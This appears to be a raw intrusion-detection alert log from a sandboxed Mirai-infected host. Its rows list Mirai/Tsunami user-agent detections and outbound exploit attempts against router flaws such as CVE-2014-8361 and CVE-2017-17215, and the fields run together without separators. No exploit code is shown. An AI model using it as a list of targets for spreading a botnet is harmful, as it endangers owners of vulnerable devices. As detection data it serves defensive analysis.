                            192.168.2.2337.143.8.6560930802846457 10/23/22-17:57:31.334102TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6093080192.168.2.2337.143.8.65
                            192.168.2.2384.201.156.23847968802846457 10/23/22-17:57:56.420539TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4796880192.168.2.2384.201.156.238
                            192.168.2.23188.54.50.9157074802846457 10/23/22-17:58:08.054624TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5707480192.168.2.23188.54.50.91
                            192.168.2.2395.102.123.4041636802027121 10/23/22-17:57:16.166579TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4163680192.168.2.2395.102.123.40
                            192.168.2.23122.226.189.7956548528692027339 10/23/22-17:58:20.278104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5654852869192.168.2.23122.226.189.79
                            192.168.2.23213.176.29.460688802846380 10/23/22-17:56:39.254984TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6068880192.168.2.23213.176.29.4
                            192.168.2.23178.19.152.2144438802846380 10/23/22-17:56:49.729037TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4443880192.168.2.23178.19.152.21
                            192.168.2.23200.88.17.6541946802846380 10/23/22-17:58:22.587044TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4194680192.168.2.23200.88.17.65
                            192.168.2.23206.2.211.22535232802846380 10/23/22-17:57:38.245828TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3523280192.168.2.23206.2.211.225
                            192.168.2.2346.158.35.1104346875472023548 10/23/22-17:58:35.885954TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE434687547192.168.2.2346.158.35.110
                            192.168.2.2351.158.116.10236820802841623 10/23/22-17:57:46.500681TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3682080192.168.2.2351.158.116.102
                            192.168.2.2395.54.46.25157992802027121 10/23/22-17:58:39.781212TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5799280192.168.2.2395.54.46.251
                            192.168.2.2395.100.117.19057736802027121 10/23/22-17:58:36.363743TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5773680192.168.2.2395.100.117.190
                            192.168.2.2395.101.47.1133798802027121 10/23/22-17:57:52.080681TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3379880192.168.2.2395.101.47.11
                            192.168.2.2382.45.209.20759048802846380 10/23/22-17:58:06.234668TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5904880192.168.2.2382.45.209.207
                            192.168.2.23181.161.93.350864802846380 10/23/22-17:57:49.051294TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5086480192.168.2.23181.161.93.3
                            192.168.2.2395.213.237.2453750802027121 10/23/22-17:57:23.629839TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5375080192.168.2.2395.213.237.24
                            192.168.2.2354.217.124.4532912802841623 10/23/22-17:58:21.159984TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3291280192.168.2.2354.217.124.45
                            192.168.2.2395.100.67.21751706802027121 10/23/22-17:58:30.344491TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5170680192.168.2.2395.100.67.217
                            192.168.2.23200.7.43.13444516802846380 10/23/22-17:57:43.654408TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4451680192.168.2.23200.7.43.134
                            192.168.2.23130.61.83.10437496802841623 10/23/22-17:57:50.384084TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3749680192.168.2.23130.61.83.104
                            192.168.2.2378.47.26.11738060802846457 10/23/22-17:57:46.265474TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3806080192.168.2.2378.47.26.117
                            192.168.2.23188.25.13.18053442802846457 10/23/22-17:57:00.255801TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5344280192.168.2.23188.25.13.180
                            192.168.2.2395.217.234.17857844802027121 10/23/22-17:57:40.691991TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5784480192.168.2.2395.217.234.178
                            192.168.2.23169.61.86.9237662802846380 10/23/22-17:58:30.957152TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3766280192.168.2.23169.61.86.92
                            192.168.2.2388.212.60.3251026802027121 10/23/22-17:57:31.198621TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5102680192.168.2.2388.212.60.32
                            192.168.2.2380.47.207.15747252802846380 10/23/22-17:57:51.852323TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4725280192.168.2.2380.47.207.157
                            192.168.2.23156.254.33.11235616372152835222 10/23/22-17:58:32.625173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561637215192.168.2.23156.254.33.112
                            192.168.2.2395.101.191.752610802027121 10/23/22-17:57:25.813902TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5261080192.168.2.2395.101.191.7
                            192.168.2.23206.189.140.1350494802846380 10/23/22-17:56:59.862386TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5049480192.168.2.23206.189.140.13
                            192.168.2.23112.169.253.21045966802027121 10/23/22-17:57:31.157232TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4596680192.168.2.23112.169.253.210
                            192.168.2.2380.211.234.10458442802846380 10/23/22-17:57:51.859098TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5844280192.168.2.2380.211.234.104
                            192.168.2.23200.53.43.12942708802846380 10/23/22-17:57:57.993551TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4270880192.168.2.23200.53.43.129
                            192.168.2.235.172.190.4245672802846457 10/23/22-17:57:35.635252TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4567280192.168.2.235.172.190.42
                            192.168.2.2388.20.177.9946006802027121 10/23/22-17:57:52.341639TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4600680192.168.2.2388.20.177.99
                            192.168.2.235.161.86.359276802846457 10/23/22-17:57:35.772864TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5927680192.168.2.235.161.86.3
                            192.168.2.23110.47.103.12055096802846457 10/23/22-17:57:43.839397TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5509680192.168.2.23110.47.103.120
                            192.168.2.232.18.102.13338190802846457 10/23/22-17:57:50.334993TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3819080192.168.2.232.18.102.133
                            192.168.2.2388.216.96.21756718802027121 10/23/22-17:58:19.650206TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5671880192.168.2.2388.216.96.217
                            192.168.2.23195.164.254.22945368528692027339 10/23/22-17:58:30.472740TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4536852869192.168.2.23195.164.254.229
                            192.168.2.23195.20.46.13146474802846457 10/23/22-17:58:21.665596TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4647480192.168.2.23195.20.46.131
                            192.168.2.2395.86.69.17139182802027121 10/23/22-17:57:54.677535TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3918280192.168.2.2395.86.69.171
                            192.168.2.23122.155.165.12139624802846457 10/23/22-17:57:26.313775TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3962480192.168.2.23122.155.165.121
                            192.168.2.2382.167.137.18938136802846380 10/23/22-17:57:48.493673TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3813680192.168.2.2382.167.137.189
                            192.168.2.2385.114.139.23358202802846457 10/23/22-17:58:26.388315TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5820280192.168.2.2385.114.139.233
                            192.168.2.2388.221.165.11249852802027121 10/23/22-17:58:36.299989TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4985280192.168.2.2388.221.165.112
                            192.168.2.2382.163.177.21559226802846380 10/23/22-17:58:06.170271TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5922680192.168.2.2382.163.177.215
                            192.168.2.2380.14.206.22454522802846457 10/23/22-17:57:09.752560TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5452280192.168.2.2380.14.206.224
                            192.168.2.23181.127.57.13545708802846380 10/23/22-17:58:01.205229TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4570880192.168.2.23181.127.57.135
                            192.168.2.2383.196.32.2848108802846380 10/23/22-17:58:25.093178TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4810880192.168.2.2383.196.32.28
                            192.168.2.2378.186.147.22852716802846457 10/23/22-17:57:46.335397TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5271680192.168.2.2378.186.147.228
                            192.168.2.2346.246.3.18356212802846457 10/23/22-17:57:41.270857TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5621280192.168.2.2346.246.3.183
                            192.168.2.2387.241.135.851746802841623 10/23/22-17:57:01.193468TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5174680192.168.2.2387.241.135.8
                            192.168.2.23185.10.158.2156654802835221 10/23/22-17:56:51.489662TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5665480192.168.2.23185.10.158.21
                            192.168.2.23178.73.244.3137048802846380 10/23/22-17:56:55.338953TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3704880192.168.2.23178.73.244.31
                            192.168.2.23186.78.174.7339924802841623 10/23/22-17:58:29.701765TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3992480192.168.2.23186.78.174.73
                            192.168.2.2384.95.201.15037332802846457 10/23/22-17:58:33.030575TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3733280192.168.2.2384.95.201.150
                            192.168.2.23188.166.65.12949916802846457 10/23/22-17:58:07.918432TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4991680192.168.2.23188.166.65.129
                            192.168.2.2337.187.128.10643334802846457 10/23/22-17:57:31.303881TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4333480192.168.2.2337.187.128.106
                            192.168.2.23200.88.229.24157376802846380 10/23/22-17:58:16.958982TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5737680192.168.2.23200.88.229.241
                            192.168.2.2395.100.226.18053890802027121 10/23/22-17:57:57.707113TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5389080192.168.2.2395.100.226.180
                            192.168.2.2384.228.228.16142622802846457 10/23/22-17:57:18.503458TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4262280192.168.2.2384.228.228.161
                            192.168.2.23164.85.76.25540500802846457 10/23/22-17:57:55.922977TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4050080192.168.2.23164.85.76.255
                            192.168.2.23213.232.8.23949162802846380 10/23/22-17:56:39.207770TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4916280192.168.2.23213.232.8.239
                            192.168.2.2395.153.224.2834292802027121 10/23/22-17:58:07.443694TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3429280192.168.2.2395.153.224.28
                            192.168.2.2344.241.137.22341180802841623 10/23/22-17:57:35.559879TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4118080192.168.2.2344.241.137.223
                            192.168.2.23142.252.140.22739146802841623 10/23/22-17:57:12.578454TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3914680192.168.2.23142.252.140.227
                            192.168.2.2395.213.158.10644822802027121 10/23/22-17:57:28.484723TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4482280192.168.2.2395.213.158.106
                            192.168.2.23213.235.229.2936324802846380 10/23/22-17:56:39.153991TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3632480192.168.2.23213.235.229.29
                            192.168.2.2384.10.34.6633618802846457 10/23/22-17:57:46.289400TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3361880192.168.2.2384.10.34.66
                            192.168.2.2388.209.202.25049224802027121 10/23/22-17:57:31.417504TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4922480192.168.2.2388.209.202.250
                            192.168.2.23176.235.113.11547138802841623 10/23/22-17:58:11.353459TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4713880192.168.2.23176.235.113.115
                            192.168.2.2385.23.25.17359214802846457 10/23/22-17:57:58.561599TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5921480192.168.2.2385.23.25.173
                            192.168.2.23200.71.190.2643940802846380 10/23/22-17:57:13.975978TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4394080192.168.2.23200.71.190.26
                            192.168.2.2386.199.104.13443130802846380 10/23/22-17:58:35.754031TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4313080192.168.2.2386.199.104.134
                            192.168.2.2395.173.11.14842778802027121 10/23/22-17:58:12.779990TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4277880192.168.2.2395.173.11.148
                            192.168.2.2380.94.55.2045878802846380 10/23/22-17:58:29.784461TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4587880192.168.2.2380.94.55.20
                            192.168.2.23156.213.12.10237264802841623 10/23/22-17:58:14.113045TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3726480192.168.2.23156.213.12.102
                            192.168.2.2386.138.172.845622802846380 10/23/22-17:57:07.231449TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4562280192.168.2.2386.138.172.8
                            192.168.2.2386.129.74.6348334802846380 10/23/22-17:57:01.329005TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4833480192.168.2.2386.129.74.63
                            192.168.2.2388.70.28.21247484802027121 10/23/22-17:56:58.725651TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4748480192.168.2.2388.70.28.212
                            192.168.2.23112.124.157.6442232802027121 10/23/22-17:57:07.684407TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4223280192.168.2.23112.124.157.64
                            192.168.2.235.74.216.8344712802846457 10/23/22-17:57:53.450782TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4471280192.168.2.235.74.216.83
                            192.168.2.2374.97.189.4743448802835222 10/23/22-17:58:16.624285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344880192.168.2.2374.97.189.47
                            192.168.2.2384.15.46.1443130802846457 10/23/22-17:56:43.315056TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4313080192.168.2.2384.15.46.14
                            192.168.2.2388.97.144.8934164802027121 10/23/22-17:57:02.482831TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3416480192.168.2.2388.97.144.89
                            192.168.2.23164.155.153.4332818528692027339 10/23/22-17:57:55.998248TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3281852869192.168.2.23164.155.153.43
                            192.168.2.2388.87.12.12556206802027121 10/23/22-17:57:02.495037TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5620680192.168.2.2388.87.12.125
                            192.168.2.23122.135.83.3034560802846457 10/23/22-17:57:26.414141TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3456080192.168.2.23122.135.83.30
                            192.168.2.23178.183.92.24255824802846380 10/23/22-17:57:09.503462TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5582480192.168.2.23178.183.92.242
                            192.168.2.23213.119.109.18947874802846380 10/23/22-17:57:03.553442TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4787480192.168.2.23213.119.109.189
                            192.168.2.235.254.71.21750546802846457 10/23/22-17:57:09.694375TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5054680192.168.2.235.254.71.217
                            192.168.2.23195.201.125.4337294802846457 10/23/22-17:56:43.200594TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3729480192.168.2.23195.201.125.43
                            192.168.2.23156.244.197.338410802841623 10/23/22-17:58:21.114648TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3841080192.168.2.23156.244.197.3
                            192.168.2.23195.201.236.5746022802846457 10/23/22-17:57:59.908703TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4602280192.168.2.23195.201.236.57
                            192.168.2.23112.74.216.14660594802027121 10/23/22-17:56:41.486203TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6059480192.168.2.23112.74.216.146
                            192.168.2.2395.214.181.1350726802027121 10/23/22-17:57:49.347734TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5072680192.168.2.2395.214.181.13
                            192.168.2.23197.242.150.8545212802841623 10/23/22-17:57:12.916299TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4521280192.168.2.23197.242.150.85
                            192.168.2.23112.74.189.17540278802027121 10/23/22-17:56:46.365079TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4027880192.168.2.23112.74.189.175
                            192.168.2.23181.52.121.1443112802846380 10/23/22-17:57:03.630757TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4311280192.168.2.23181.52.121.14
                            192.168.2.2395.216.157.18141296802027121 10/23/22-17:57:45.098634TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4129680192.168.2.2395.216.157.181
                            192.168.2.23213.211.102.10938970802846380 10/23/22-17:57:37.960194TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3897080192.168.2.23213.211.102.109
                            192.168.2.23112.126.72.3349028802027121 10/23/22-17:58:27.406524TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4902880192.168.2.23112.126.72.33
                            192.168.2.23213.32.71.16941058802846380 10/23/22-17:58:33.195867TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4105880192.168.2.23213.32.71.169
                            192.168.2.2337.26.124.21336646802846457 10/23/22-17:57:28.829529TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3664680192.168.2.2337.26.124.213
                            192.168.2.23169.50.35.10149620802846380 10/23/22-17:57:51.801270TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4962080192.168.2.23169.50.35.101
                            192.168.2.2385.215.98.14537062802846457 10/23/22-17:58:17.685151TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3706280192.168.2.2385.215.98.145
                            192.168.2.2389.252.186.13651966802846457 10/23/22-17:58:32.895297TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5196680192.168.2.2389.252.186.136
                            192.168.2.2372.32.131.2447166802835221 10/23/22-17:57:11.261983TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4716680192.168.2.2372.32.131.24
                            192.168.2.2395.129.56.21134566802027121 10/23/22-17:56:48.866949TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3456680192.168.2.2395.129.56.211
                            192.168.2.2378.47.162.14935934802846457 10/23/22-17:58:28.628955TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3593480192.168.2.2378.47.162.149
                            192.168.2.2380.158.44.20243626802846380 10/23/22-17:58:29.776670TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4362680192.168.2.2380.158.44.202
                            192.168.2.2346.150.200.3543292802846457 10/23/22-17:58:15.388171TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4329280192.168.2.2346.150.200.35
                            192.168.2.2395.216.139.18558198802027121 10/23/22-17:57:31.276613TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5819880192.168.2.2395.216.139.185
                            192.168.2.23178.239.171.17342144802846380 10/23/22-17:57:27.966144TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4214480192.168.2.23178.239.171.173
                            192.168.2.2395.211.106.4541256802027121 10/23/22-17:57:18.686379TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4125680192.168.2.2395.211.106.45
                            192.168.2.2395.87.64.9744086802027121 10/23/22-17:57:40.846678TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4408680192.168.2.2395.87.64.97
                            192.168.2.2388.221.24.6535450802027121 10/23/22-17:58:10.574728TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3545080192.168.2.2388.221.24.65
                            192.168.2.2380.247.76.23345032802846380 10/23/22-17:57:43.270523TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4503280192.168.2.2380.247.76.233
                            192.168.2.23178.90.69.25534610802846380 10/23/22-17:57:55.499865TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3461080192.168.2.23178.90.69.255
                            192.168.2.235.76.255.10347538802846457 10/23/22-17:57:53.428860TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4753880192.168.2.235.76.255.103
                            192.168.2.23197.90.66.2074959875472835222 10/23/22-17:58:16.541329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)495987547192.168.2.23197.90.66.207
                            192.168.2.2384.7.151.1646196528692027339 10/23/22-17:57:20.233975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4619652869192.168.2.2384.7.151.16
                            192.168.2.23112.124.21.5545122802027121 10/23/22-17:57:31.198551TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4512280192.168.2.23112.124.21.55
                            192.168.2.23164.155.235.16435986528692027339 10/23/22-17:58:36.207823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3598652869192.168.2.23164.155.235.164
                            192.168.2.2384.128.80.5643252802846457 10/23/22-17:56:43.243891TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4325280192.168.2.2384.128.80.56
                            192.168.2.2378.140.134.18732774802846457 10/23/22-17:58:04.229718TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3277480192.168.2.2378.140.134.187
                            192.168.2.2395.85.43.23150884802027121 10/23/22-17:58:37.404942TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5088480192.168.2.2395.85.43.231
                            192.168.2.2383.23.75.1352542802846380 10/23/22-17:58:30.980025TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5254280192.168.2.2383.23.75.13
                            192.168.2.23213.10.80.11257334802846380 10/23/22-17:56:42.732402TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5733480192.168.2.23213.10.80.112
                            192.168.2.2337.150.232.8151152802846457 10/23/22-17:57:08.354913TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5115280192.168.2.2337.150.232.81
                            192.168.2.2382.153.66.5741406802846380 10/23/22-17:58:06.719457TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4140680192.168.2.2382.153.66.57
                            192.168.2.235.2.203.4653962802846457 10/23/22-17:56:55.121791TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5396280192.168.2.235.2.203.46
                            192.168.2.23206.189.135.5452776802846380 10/23/22-17:57:29.512407TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5277680192.168.2.23206.189.135.54
                            192.168.2.2346.248.63.18754830802846457 10/23/22-17:57:43.531129TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5483080192.168.2.2346.248.63.187
                            192.168.2.23156.241.118.18549524802841623 10/23/22-17:57:46.808203TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4952480192.168.2.23156.241.118.185
                            192.168.2.2337.1.222.7946536802846457 10/23/22-17:57:07.095976TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4653680192.168.2.2337.1.222.79
                            192.168.2.23168.181.187.25454136802835221 10/23/22-17:57:16.449081TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5413680192.168.2.23168.181.187.254
                            192.168.2.23112.83.38.16835688802027121 10/23/22-17:58:36.268889TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3568880192.168.2.23112.83.38.168
                            192.168.2.2395.100.115.22055196802027121 10/23/22-17:57:33.458382TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5519680192.168.2.2395.100.115.220
                            192.168.2.2361.110.198.2150616802846457 10/23/22-17:57:02.954510TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5061680192.168.2.2361.110.198.21
                            192.168.2.23112.220.159.1247024802027121 10/23/22-17:57:10.375827TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4702480192.168.2.23112.220.159.12
                            192.168.2.23206.2.139.23659032802846380 10/23/22-17:57:55.415092TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5903280192.168.2.23206.2.139.236
                            192.168.2.2346.242.205.11451852802846457 10/23/22-17:58:05.462895TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5185280192.168.2.2346.242.205.114
                            192.168.2.2388.198.105.10752334802027121 10/23/22-17:56:51.035370TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5233480192.168.2.2388.198.105.107
                            192.168.2.23181.198.64.13755770802846380 10/23/22-17:56:55.834421TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5577080192.168.2.23181.198.64.137
                            192.168.2.2395.65.83.18654456802027121 10/23/22-17:57:21.048077TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5445680192.168.2.2395.65.83.186
                            192.168.2.2378.129.173.4137622802846457 10/23/22-17:58:04.238204TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3762280192.168.2.2378.129.173.41
                            192.168.2.2352.51.101.18956142802841623 10/23/22-17:57:11.020124TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5614280192.168.2.2352.51.101.189
                            192.168.2.2388.99.164.352868802027121 10/23/22-17:57:21.050541TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5286880192.168.2.2388.99.164.3
                            192.168.2.2380.114.22.1257820802846457 10/23/22-17:58:26.453208TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5782080192.168.2.2380.114.22.12
                            192.168.2.23112.19.3.21242120802027121 10/23/22-17:56:46.365118TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4212080192.168.2.23112.19.3.212
                            192.168.2.23200.11.154.20660152802846380 10/23/22-17:58:22.232116TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6015280192.168.2.23200.11.154.206
                            192.168.2.235.189.168.2338262802846457 10/23/22-17:57:46.216121TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3826280192.168.2.235.189.168.23
                            192.168.2.23112.213.87.3451162802027121 10/23/22-17:57:52.153428TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5116280192.168.2.23112.213.87.34
                            192.168.2.23213.43.27.10837120802846380 10/23/22-17:57:03.881859TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3712080192.168.2.23213.43.27.108
                            192.168.2.23213.106.24.19239220802846380 10/23/22-17:56:47.013902TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3922080192.168.2.23213.106.24.192
                            192.168.2.2395.100.85.19533698802027121 10/23/22-17:57:57.655163TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3369880192.168.2.2395.100.85.195
                            192.168.2.23200.98.245.1650152802846380 10/23/22-17:57:10.839547TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5015280192.168.2.23200.98.245.16
                            192.168.2.2389.25.223.21946600802846457 10/23/22-17:57:43.767560TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4660080192.168.2.2389.25.223.219
                            192.168.2.2378.47.101.738316802841623 10/23/22-17:58:25.556348TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3831680192.168.2.2378.47.101.7
                            192.168.2.23178.32.150.6839950802846380 10/23/22-17:56:55.332041TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3995080192.168.2.23178.32.150.68
